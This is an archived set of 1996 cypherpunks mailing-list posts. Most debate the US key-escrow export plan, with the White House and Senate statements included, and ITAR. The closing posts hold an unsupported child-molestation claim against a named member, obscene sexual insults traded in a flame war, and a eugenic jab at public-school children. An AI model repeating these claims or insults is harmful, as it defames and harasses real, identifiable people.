cryptography with differing levels of security in an interoperable way.  When
the alliance implements this  technology it will give the user a new level of
flexibility that did  not exist before.  In an imperfect world this technique
will at least allow you to take advantage of what governments around the
world will allow."

"We're delighted to be part of the alliance because we believe  the adoption
of a worldwide standard for key recovery is essential to solving current
network security problems," said Stephen T. Walker,  president and CEO of
TIS.  "User-controlled key recovery systems  including our own products have
already demonstrated that user  privacy concerns and exportability
requirements can be successfully  addressed.  But there must be worldwide
interoperability.  And it is  our hope that the alliance will be able to
accomplish that."

"The work of the alliance could have a profound impact on  conducting
international business over the Internet," said Joe Pyne,  UPS vice president
of marketing.  "UPS is committed to improving the  movement of both
information and packages in secure and time  sensitive manners.  The alliance
allows us to combine our expertise,  energies and financial strength to
quickly develop standards that  will open the door for rapid development of
products and services."

CONTACT:

Apple Computer, Inc.

Maureen O'Connell

408-862-6689

or

Atalla

Gary Lefkowitz

408-435-5715

or

Digital Equipment Corp.

Patrick Ward

508-493-9441

or

Groupe Bull

Jean-Jacques Roulmann

33-1-39-66-3970

or

Hewlett-Packard

Kimberly Daniel

408-447-4587

or

IBM

Mike Corrado

914-766-1162

or

NCR

Bob Farkus

513-445-2078

or

RSA Data Communications

Ginny Kirkley

415-595-8782

or

Sun Microsystems Inc.

Ray Nasser

415-786-4395

or

Trusted Information Systems

Homayoon Tajalli

301-854-6889

or

UPS

Pat Stephen

201-828-6103

KEYWORD: NEW YORK

INDUSTRY KEYWORD: COMPUTERS/ELECTRONICS COMED



BW0153  OCT 02,1996

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 3 Oct 1996 10:27:52 +0800
To: roger@coelacanth.com (Roger Williams)
Subject: Re: Export laws don't just affect crypto
In-Reply-To: <9610011330.AA1519@sturgeon.coelacanth.com>
Message-ID: <199610022202.RAA00162@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> 
> >>>>> Lucky Green <shamrock@netcom.com> writes:
> 
>   > "Higher altitude and velocities up to 25,000 nautical
>   > miles-per-hour options are available in the U.S."
> 
>   > I gather from this that as long as you are in the US, you are
>   > welcome to use this technology for applications that require
>   > larger than 1,000 nmph speeds.
> 
> Umm, so are you violating ITAR if you *use* these GPS-guided missiles
> outside the US? ;-)
  
     No, only if you _sell_ them (well, give, loan &etc)


     Hey buddy, can you spare a guided missle...

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 3 Oct 1996 11:15:54 +0800
To: moroni@scranton.com (Moroni)
Subject: Re: Utah as a Religious Police State [RANT]
In-Reply-To: <Pine.LNX.3.95.961001105928.27216D-100000@user1.scranton.com>
Message-ID: <199610022206.RAA00174@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text


> 
>    The database is just for genealogical stuff and church papers.
> 
     "Key escrow will only allow properly authorized personal to access
your keys"

     "We're from the government, we're here to help you". 

     Government is Government, wether dumbocracy, or theocracy.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Thu, 3 Oct 1996 10:34:38 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Censorship?
Message-ID: <2.2.32.19961002210921.00673cb4@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


What say ye??

:From: Zimm2@gnn.com (Zimm2)
:Newsgroups: alt.security.pgp
:Subject: Cypherpunks engaged in censorship?
:Date: Wed, 02 Oct 1996 08:39:50
:
:It has come to my attention that Cypherpunks no longer allows users of 
:Microsoft browsers to access their archives.
:
:Is it contradictory for an organization who proclaims an interest in the free 
:exchange of ideas through the mechanism of the Internet to limit the exchange 
:of ideas using an individual's software decisions as the criteria?
:
:Are issues of annonymity and privacy and the encouragement of private use of 
:powerful encryption and remailer tools secondary to and less important than a 
:crusade against a software manufacturer?
:
:Should corporate users of the Internet or individuals unable to access the 
:Internet through any other means than corporate or public computers be denied 
:access to information because the computer owner insists on a particular, and 
:freely chosen software package?
:
:Will the Internet continue in the direction of propagating propaganda or will 
:the original rule of releasing all information to the public and letting the 
:public decide be the rule of the Internet?
:
:I, of course, know my own feelings on these issues but want to know how far 
:out of the pale I am.  
:





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 3 Oct 1996 10:26:43 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Forwarded mail....
Message-ID: <Pine.SUN.3.94.961002180643.27397C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



This was cute.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li

---------- Forwarded message ----------
Date: Wed, 2 Oct 1996 11:39:52 -0400 (EDT)
From: Mail AutoResponder <abusebot@answerme.com>
To: black unicorn <unicorn@schloss.li>

Please do not send messages to this autoresponder using
foul language.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Thu, 3 Oct 1996 17:31:50 +0800
To: cypherpunks@toad.com
Subject: Re: NYT on IBM GAK
Message-ID: <3.0b24.32.19961002181037.0067e434@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:03 PM 10/2/96 -0800, you wrote:
>At 08:26 AM 10/2/96 -0700, Lucky Green wrote:
>>
>>
>>On Wed, 2 Oct 1996, John Young wrote:
>>
>>>    The New York Times, October 2, 1996, pp. D1, D8. 
>>>    Executives of the International Business Machines 
>>>    Corporation said late yesterday that they were still lining 
>>>    up the final list of companies in the alliance. Those 
>>>    involved will include Digital Equipment and smaller 
>>>    data-security companies including RSA Data Security, Cylink 
>>>    and Trusted Information Systems. 
>>
>>We are in deep trouble.
>>--Lucky
>
>Wouldn't a letter-writing campaign be in order here?  
[snip]

The word "boycott" leaped into my mind.  I personally do not believe that I
will be buying products from any of these companies, as long as thay
participate in this GAK charade.



Rich






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Thu, 3 Oct 1996 17:55:00 +0800
To: mirele@xmission.com>
Subject: Re: Utah as a Religious Police State
Message-ID: <199610030114.SAA07185@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


I am going out of my mind behind this one.  Please kill this topic.  
I left the Mormon church long ago, and I don't want a dose of LDS 
with my crypto-fix!

On or About  2 Oct 96 at 12:33, Deana Holmes wrote:

> On  2 Oct 96 at 8:47, John C. Randolph wrote:
> 
> > 
> > Moroni says:
> > 
> > >I never cease to be surprised by the interest that gentiles show
> > >in working mormon communities while totally neglecting their own
> > >failing areas.
> > 
> > I don't do a lot of nit-picking on this mailing list, but:
> > 
> > I am a Jew. *You* are a gentile. So are all the rest of the mormons.
> > Get this point straight.
> 


> Uh, in Utah, Jews are Gentiles. No lie.

Yeah, I knew that.  I know plenty, and there are many pages for 
recovering Mormons.  Believe me, I've been there.  I could go on about 
my personal experiences of being on the "fast track" to church 
leadership, but that's the point.  I would rather not hear about it 
here.

Ross 

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 3 Oct 1996 13:11:33 +0800
To: cypherpunks@toad.com
Subject: Re: ITAR satellite provision
Message-ID: <3.0b28.32.19961002182541.0068b310@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 AM 10/2/96 -0700, I wrote:

>I think you're talking about the definition of "export", located at 22 CFR
>120.10:
 ^^^^^^

but upon closer inspection it looks like the House of Representatives'
WWW-accessible version that I looked it up in is out of date. (geez.)

The more current version is located at 22 CFR 120.17; there are some
wording changes in the definition of export but the exemption for launch
vehicles and payloads is unchanged. ("(6) A launch vehicle or payload shall
not, by reason of the launching of such vehicle, be considered an export
for purposes of this subchapter.")

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Thu, 3 Oct 1996 14:12:39 +0800
To: cypherpunks@toad.com
Subject: INFO: White House Clipper 3.1.1 plan unveiled; continues to ignore privacy concerns
Message-ID: <199610022232.SAA06896@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|

             WHITE HOUSE RELEASES CLIPPER 3.1.1 PLAN; SAME OLD STORY
              EXCLUDES CONGRESS; PROPOSAL DRIVEN BY LAW ENFORCEMENT
                  NO CONCERNS FOR PRIVACY OF INTERNET USERS
		          http://www.crypto.com/

                          Date: October 2, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        Introduction
	White House announces new encryption proposal
	Text of White House announcement
	Response from Senator Patrick Leahy (D-VT)
	Response from Senator Conrad Burns (R-MT)
        How to receive crypto-news
        Press contacts

-----------------------------------------------------------------------------
INTRODUCTION

Interested in spreading the word in Congress about privacy rights and
encryption?  Want to help Congress fight the White House's poorly
crafted, dictatorial, encryption policies?

WWW.Crypto.Com has opened up a new service, "Adopt Your Legislator",
which allows you to add your name to a targeted list for contacting
your legislators.

Whenever your legislator is teetering on an issue related to privacy or
encryption, we'll notify you directly for a focused call-in/write-in
campaign.

It's fast, it's easy, it's like having your own personal activist.  Sign
up at http://www.crypto.com/ or through one of the many fine organizations
below that have links to the adoption pages:

	Electronic Frontier Foundation (http://www.eff.org/)
	Center for Democracy and Technology (http://www.cdt.org/)
	Voters Telecommunications Watch (http://www.vtw.org/)

Look for the "My Lock, My Key" icon and follow it to help fight the
new Clipper 3.1.1 proposal and fight for your privacy!

-----------------------------------------------------------------------------
WHITE HOUSE ANNOUNCES NEW ENCRYPTION PROPOSAL

The White House announced their new encryption proposal yesterday.  There are
several main points that have come out now, or will appear soon:
	-jurisdictional move from State to Commerce for export applications
	 with a Department of Justice role
	-temporary increase of key lengths to 56 bits, provided future key
	 escrow functionality is promised,
	-joint effort with companies such as IBM to produce key escrow
	 products,
	-increased purchasing of key recovery products by Federal agencies
	 to stimulate the creation of a key escrow industry, and
	-legislation to legitimize the key escrow recovery market.

There are absolutely no plans to permanently increase the key length of
unescrowed encryption products.  Companies who do not have an escrow plan
in place by the end of the two year temporary increase will lose their 
export status.

This proposal has a number of significant problems, including:

DOMINATED AND DRIVEN BY LAW ENFORCEMENT INTERESTS
This Clipper proposal, like the three previous ones, has been driven
entirely by the concerns of law enforcement.  This should come as no surprise
to even the most optimistic industry or public interest advocates.
As Senator Leahy (D-VT) says in his statement below:

	Internet users themselves -- not the FBI, not the NSA, not
     any government regulator -- should decide what encryption method
     best serves their needs.

JUSTICE ROLE IN EXPORT APPLICATIONS A BLATANT ATTEMPT AT DOMESTIC CONTROL
 OF CRYPTOGRAPHY
By allowing Justice a seat at the table in approving export applications,
the Clinton Administration has clearly demonstrated that they wish to 
control the domestic cryptography market.  Justice will certainly veto
the export applications of any products which they are not able to
break either by brute force or without key escrow.  This will probably
end up being an even worse route for companies wishing to export
products.

TEMPORARY INCREASE IN KEY LENGTH IS NOT SUFFICIENT
The original Clipper proposal would have allowed encryption with
80 bits keys.  Clipper II bandied about the number 64 as the acceptable
level of encryption.  With Clipper 3.1.1, that amount has been reduced to
56 bits for the next two years.  This is clearly too little too late.

CONGRESS WAS NOT CONSULTED
Congress has clearly stated their intentions with regards to the White
House policy, and this year will certainly not be the end of their
involvement in the issue.  Senator Burns (R-MT) summarizes it well:

  This debate is not over by any stretch of the imagination.  The
  administration has prevented Congress from weighing in on this issue just
  as support was building for a legislative solution.  I intend to move
  forward with pro-encryption legislation in the next Congress.

You can continue to follow this issue at http://www.crypto.com/ !

-----------------------------------------------------------------------------
TEXT OF WHITE HOUSE ANNOUNCEMENT

THE WHITE HOUSE
Office of the Vice President

FOR IMMEDIATE RELEASE
CONTACT:  456-7035
TUESDAY, October 1, 1996

STATEMENT OF THE VICE PRESIDENT

President Clinton and I are committed to promoting the growth of electronic
commerce and robust, secure communications worldwide while protecting the
public safety and national security.  To that end, this Administration is
consulting with Congress, the information technology industry, state and
local law enforcement officials, and foreign governments on a major
initiative to liberalize export controls for commercial encryption
products.

The Administration's initiative will make it easier for Americans to use
stronger encryption products -- whether at home or abroad -- to protect
their privacy, intellectual property and other valuable information.  It
will support the growth of electronic commerce, increase the security of
the global information, and sustain the economic competitiveness of U.S.
encryption product manufacturers during the transition to a key management
infrastructure.

Under this initiative, the export of 56-bit key length encryption products
will be permitted under a general license after one-time review, and
contingent upon industry commitments to build and market future products
that support key recovery.  This policy will apply to hardware and software
products.  The relaxation of controls will last up to two years.

The Administration's initiative recognizes that an industry-led technology
strategy will expedite market acceptance of key recovery, and that the
ultimate solution must be market-driven.

Exporters of 56-bit DES or equivalent encryption products would make
commitments to develop and sell products that support the key recovery
system that I announced in July.  That vision presumes that a trusted party
(in some cases internal to the user's organization) would recover the
user's confidentiality key for the user or for law enforcement officials
acting under proper authority.  Access to keys would be provided in
accordance with destination country policies and bilateral understandings.
No key length limits or algorithm restrictions will apply to exported key
recovery products.

Domestic use of key recovery will be voluntary, and any American will
remain free to use any encryption system domestically.

The temporary relaxation of controls is one part of a broader encryption
policy initiative designed to promote electronic information security and
public safety.  For export control purposes, commercial encryption products
will no longer be treated as munitions.  After consultation with Congress,
jurisdiction for commercial encryption controls will be transferred from
the State Department to the Commerce Department.  The Administration also
will seek legislation to facilitate commercial key recovery, including
providing penalties for improper release of keys, and protecting key
recovery agents against liability when they properly release a key.

As I announced in July, the Administration will continue to expand the
purchase of key recovery products for U.S. government use, promote key
recovery arrangements in bilateral and multilateral discussions, develop
federal cryptographic and key recovery standards, and stimulate the
development of innovative key recovery products and services.

Under the relaxation, six-month general export licenses will be issued
after one-time review, contingent on commitments from exporters to explicit
benchmarks and milestones for developing and incorporating key recovery
features into their products and services, and for building the supporting
infrastructure internationally.  Initial approval will be contingent on
firms providing a plan for implementing key recovery.  The plan will
explain in detail the steps the applicant will take to develop, produce,
distribute, and/or market encryption products with key recovery features.
The specific commitments will depend on the applicant's line of business.

The government will renew the licenses for additional six-month periods if
milestones are met.  Two years from now, the export of 56-bit products that
do not support key recovery will no longer be permitted.  Currently
exportable 40-bit mass market software products will continue to be
exportable.  We will continue to support financial institutions in their
efforts to assure the recovery of encrypted financial information.  Longer
key lengths will continue to be approved for products dedicated to the
support of financial applications.

The Administration will use a formal mechanism to provide industry, users,
state and local law enforcement, and other private sector representatives
with the opportunity to advise on the future of key recovery.  Topics will
include:

	. evaluating the developing global key recovery architecture
	. assessing lessons-learned from key recovery implementation
	. advising on technical confidence issues vis-a-vis access to
	  and release of keys
	. addressing interoperability and standards issues
	. identifying other technical, policy, and program issues
	  for governmental action.

The Administration's initiative is broadly consistent with the recent
recommendations of the National Research Council.  It also addresses many
of the objectives of pending Congressional legislation.

-----------------------------------------------------------------------------
RESPONSE FROM SENATOR PATRICK LEAHY (D-VT)

        STATEMENT OF SENATOR LEAHY ON THE 
        ADMINISTRATION'S NEW ENCRYPTION INITIATIVE
                                October 1, 1996
     
        The timing of the Administration's announcement on encryption, 
     within hours of the Congress' likely adjournment, is unfortunate. 
     The Administration needs to work with Congress to develop a 
     consensus on a national encryption policy that takes account of 
     the privacy, law enforcement and competitiveness concerns of our 
     Nation's citizens and businesses. 
     
        Taking unilateral steps will not resolve this issue, but 
     instead could delay building the consensus we so urgently need. 
     This issue simply cannot by resolved by Executive fiat.
     
        While technology should not dictate policy, particularly when 
     our public safety and national security interests are at issue, 
     any policy we adopt must protect our privacy.  As the 
     Administration and industry rush to find an alternative to 
     unbreakable encryption, they should take heed that any solution 
     which fails to protect the Fourth Amendment and privacy rights of 
     our citizens will be unacceptable.
     
        That is why, with bipartisan support, Senator Burns and I 
     introduced legislation in March that set out privacy safeguards 
     to protect the decoding keys to encrypted communications and 
     stringent legal procedures for law enforcement agencies to get 
     access to those keys. 
     
        In this plan, the Administration is directing the resources of 
     our high-tech industry to develop breakable, rather than 
     unbreakable, encryption. But no one is yet clear about who will 
     be legally allowed to break into encrypted messages, and under 
     what circumstances. These are questions that have to be answered 
     not only with our own government but also with foreign 
     governments.  The weakest link in a key recovery system may be 
     the country with the weakest privacy protections. Internet users, 
     who can send messages around the globe seamlessly, do not want 
     the privacy of their encrypted communications to be at the mercy 
     of a country that ignores the Fourth Amendment principles we 
     enjoy here. 
     
        These are significant privacy and security concerns not 
     answered by the Administration's plan. 
     
        Even without reading the fine print, the general outline of 
     the Administration's plan smacks of the government trying to 
     control the marketplace for high-tech products. Only those 
     companies that agree to turn over their business plans to the 
     government and show that they are developing key recovery 
     systems, will be rewarded with permission to sell abroad products 
     with DES encryption, which is the global encryption standard. 
     
        Conditioning foreign sales of products with DES on development 
     of key recovery systems puts enormous pressure on our computer 
     industry to move forward with key recovery, whether their 
     customers want it or not.
     
         Internet users themselves -- not the FBI, not the NSA, not 
     any government regulator -- should decide what encryption method 
     best serves their needs. Then the marketplace will be able to 
     respond. The Administration is putting the proverbial cart before 
     the horse, by putting law enforcement interests ahead of every 
     one elses.
     
        But that is not the only catch in the Administration's plan. 
     Permission to export DES will end in two years. Allowing American 
     companies to sell DES overseas is a step long overdue. Given the 
     fact that a Japanese company is already selling "triple DES", one 
     might say this step is too little, too late. Threatening to pull 
     the plug on DES in two years, when this genie is already out of 
     the bottle, does not promote our high-tech industries overseas. 
     Does this mean that U.S. companies selling sophisticated computer 
     systems with DES encryption overseas must warn their customers 
     that the supply may end in two years? Customers both here and 
     abroad want stable suppliers, not those jerked around by their 
     government.
     
        The most effective way to protect the privacy and security of 
     our on-line communications is to use encryption technology. Every 
     American should be concerned about our country's policy on 
     encryption since the resolution of this debate will affect 
     privacy, jobs and the competitiveness of our high-tech 
     industries. 

-----------------------------------------------------------------------------
RESPONSE FROM SENATOR CONRAD BURNS (R-MT)

  For immediate release:          Contact:                    Matt Raymond
  Tuesday, October 1, 1996                                  (202) 224-8150
                                                           Randall Popelka
                                                            (202) 224-6137
  
  Burns Cautious on Encryption Plan
  Oversight Vowed for Plan That "Raises More Questions Than It Answers"
  
        WASHINGTON, D.C. _ Montana Senator Conrad Burns today reacted 
  cautiously to plans by the Clinton administration to loosen restrictions 
  on exports of stronger encryption for computer software and hardware.  He 
  also criticized the White House for its failure to negotiate on the 
  cornerstone of its proposals: that companies must agree to "escrow" their 
  decryption keys.
  
        "I have no doubt that it was the pressure of Congress, high-tech 
  companies and privacy advocates that dragged the White House kicking and 
  screaming into agreeing that export restrictions should be eased," said 
  Burns, chief sponsor of the Pro-CODE bill, which would loosen 
  restrictions on encryption exports and prohibit government-mandated key 
  escrow.  "However, I can't say I'm pleased with a process that has all 
  but excluded Congress and the public from the discussion.
  
        "The administration's insistence on key escrow as a condition of 
  lifting these restrictions has never been negotiable.  Meanwhile, what 
  choice do these companies have but to yield as their global 
  competitiveness withers on the vine?
  
        "This plan raises even more questions than it answers, such as, 
  what about the widespread availability of much stronger encryption than 
  that which is allowed by the White House?  How do we deal with rapid 
  changes in technology that will inevitably render the 56-bit limit 
  obsolete?  The devil is definitely in the details.
  
        "This debate is not over by any stretch of the imagination.  The 
  administration has prevented Congress from weighing in on this issue just 
  as support was building for a legislative solution.  I intend to move 
  forward with pro-encryption legislation in the next Congress.
  
        "I will also push for vigorous oversight of the administration's 
  plan in the Commerce Committee."  The Senate Commerce Committee, of which 
  Burns is a member, has jurisdiction over the Commerce Department.  The 
  administration has stated its intent to transfer export licensing 
  authority over encryption from the State Department to the Commerce 
  Department.
  
-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to majordomo@panix.com with "subscribe crypto-news" in the body
of the message.  To unsubscribe, send a letter to majordomo@panix.com with
"unsubscribe crypto-news" in the body.

-----------------------------------------------------------------------------
PRESS CONTACT INFORMATION

Press inquiries on Crypto-News should be directed to
	Shabbir J. Safdar (VTW) at +1.718.596.2851 or shabbir@vtw.org
	Jonah Seiger (CDT) at +1.202.637.9800 or jseiger@cdt.org

-----------------------------------------------------------------------------
End crypto-news
=============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 3 Oct 1996 18:25:53 +0800
To: cypherpunks@toad.com
Subject: Re: The Right to Keep and Bear Crypto
In-Reply-To: <v02130500ae78384961a4@[10.0.2.15]>
Message-ID: <v03007802ae78d63d5916@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


(I know I said I would try to avoid posting today, to make up for
necessarily sending my party announcement to the list, but this is too
important a topic to be silent on. I almost always agree with newcomer
Steve Schear, but on this point I think he is dead wrong.)

At 3:30 PM -0700 10/2/96, Steve Schear wrote:
>A well-regulated Militia, being necessary to the security of a free State,
>the right of the people
> to keep and bear Arms, shall not be infringed.
>                                 --Constitution of the United States of
>America,
>                                 Amendment II, 1791
>
>I'm not a consitiutional scholar, but it seems to me that since the
>government has already classed crypto as arms via ITAR and since the I am
>guaranteed the right to bear arms I choose to bear the crypto of my choice
>as part of my arsonal.

I've argued since 1992 on Usenet and here that "crypto as arms" is a
potentially dangerous tack to follow. (Others, including legal experts,
have also argued this point.)

Given that it is well-established, whether we agree or not, that the USG
may restrict private ownership of atom bombs, nerve gases, CBW weapons,
machine guns, switchblade knives, nunchuk sticks, and various other "arms,"
the association of crypto with armaments is potentially *DISASTROUS*.

A far better strategy is to associate crypto with *speech*, which most
people seem to think has stronger protection. And, truth be told, I view
encrypted communications as a helluva lot more like a form of communication
than I view it as a cousin to my Heckler & Koch .45 USP.

In my view, equating crypto with armaments is exactly what the USG would
like to see happen. This legitimizes their control of crypto.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 3 Oct 1996 10:35:51 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v03007804ae78a69525c7@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


Some idiot said,

> who cypherpunks

Heh. Sorry guys. I was testing to see if toad was up or not. Of course, I
should have sent it to majordomo, right? ;-)

Cheers,
Bob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 3 Oct 1996 10:23:20 +0800
To: Dave Temple <dtemple@ashland.edu>
Subject: Re: This list is a joke
In-Reply-To: <Pine.WNT.3.95.961001155921.242D-100000@test1>
Message-ID: <Pine.SUN.3.91.961002191508.20944B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996, Dave Temple wrote:

> When I subscribed to this list, I thought it would have decent
> communication on worthwhile topics.  I've come to realize though that 75%
> of the messages I receive are from people whining like 4 year olds.  I am
> making a huge assumption in saying that most of the people on this list
> are adults.  It is time to start acting like it.
> 
> Please take my name off of this list.

You might try a filtered version of the list instead.  If you like, send 
a message to sunder@brainlink.com with the subject "fcpunx help" for info 
on this. :)

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 3 Oct 1996 18:48:39 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <wNZPuD1w165w@bwalk.dm.com>
Message-ID: <Pine.3.89.9610021918.A21711-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> Duncan Frissell <frissell@panix.com> writes:
> > As a libertarian, I would add that the social atmosphere of a Stalinist
> > "brain factory" is not exactly the socialization I would choose for my
> > children.  I would choose a more market oriented model.
> 
> Libertarians are fucking statists, as I keep pointing out.
> 
> U.S. public school system is darwinian evolution in action. Parents who can
> afford to send their kids to private schools, do so. Parents who send their
> kids to public schools deserve to have their offsprings fucked up, mentally
> and phsyically, to improve the species' gene pool.
> 
> There are plenty of excellent private elementary and secondary schools in the
> U.S. Children who deserve better schooling (by virtue of having parents who
> have better genes and are therefore economically successful) get it.
> 

You cant be as dumb as you sound, but I've been wrong before and possibly 
way off the mark this time. Nothing like small minded liberal throwback 
philosophy to chew on like cud. It's painfully clear to me you've not 
hung around in enough financially secure circles long enough to realize 
that the socially and mentally degenerate which inhabit those realms are 
just as bad if not worse than the "common man" to whom you dispise.

Natural intellect is never discouraged nor prevented by economics. 
Book learning perpetuates existing dogma and in some cases stifles 
critical thinking when it is combined with depostic agendae. 

Never judge an idiot by the size of his wallet.

..Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dustbin Freedom Remailer <dustman@athensnet.com>
Date: Thu, 3 Oct 1996 10:43:01 +0800
To: cypherpunks@toad.com
Subject: Re: [IMPORTANT] GAK
In-Reply-To: <199610021518.LAA12535@porky.athensnet.com>
Message-ID: <199610022318.TAA15386@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> Timmy May is a convicted child molester.

When and where was he convicted?  Is a transcript of the trial
available anywhere on-line?

Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 3 Oct 1996 18:05:40 +0800
To: cypherpunks@toad.com
Subject: [SPAM] Timmy May the (alleged) animal lover
In-Reply-To: <199610021931.AA24883@crl11.crl.com>
Message-ID: <FV67uD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I have no dog, nor any other pets.  Timmy May (fart) reportedly has two cats.
If you suspect that Timmy May (fart) sexually abuses his cats, or any other
animals, you should promptly contact the ASPCA and also alert rec.pets.cats.

(Frankly, I doubt that the old fart can get his dick up to sexually abuse
anything, including his cats. Senility puts an end to sexual molestation.)

>From: Troy Varange <varange@crl.com>
>Message-Id: <199610021931.AA24883@crl11.crl.com>
>Subject: Important
>To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>Date: Wed, 2 Oct 1996 12:31:21 -0700 (PDT)
>In-Reply-To: <gqH3uD93w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 30, 96 07:57:27 am
>X-Mailer: ELM [version 2.4 PL23]
>Mime-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7bit
>Content-Length: 6226
>
>Dr. Vulis sucks his dog's butt.
>
>> Timmy May has no life.
>>
>> >From: Troy Varange <varange@crl.com>
>> >Message-Id: <199609300441.AA10704@crl12.crl.com>
>> >Subject: Re: Vulis FUCKHEAD sucks Timmy's Cock
>> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >Date: Sun, 29 Sep 1996 21:41:42 -0700 (PDT)
>> >In-Reply-To: <LJV2uD91w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 11:58:09 pm
>> >X-Mailer: ELM [version 2.4 PL23]
>> >Mime-Version: 1.0
>> >Content-Type: text/plain; charset=US-ASCII
>> >Content-Transfer-Encoding: 7bit
>> >Content-Length: 5298
>> >
>> >Vulis sucks Timmy's boyfriend's cock.
>> >>
>> >> Timmy May has no life.
>> >>
>> >> >From: Troy Varange <varange@crl.com>
>> >> >Message-Id: <199609300332.AA09870@crl12.crl.com>
>> >> >Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
>> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT)
>> >> >In-Reply-To: <ueP2uD86w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm
>> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >Mime-Version: 1.0
>> >> >Content-Type: text/plain; charset=US-ASCII
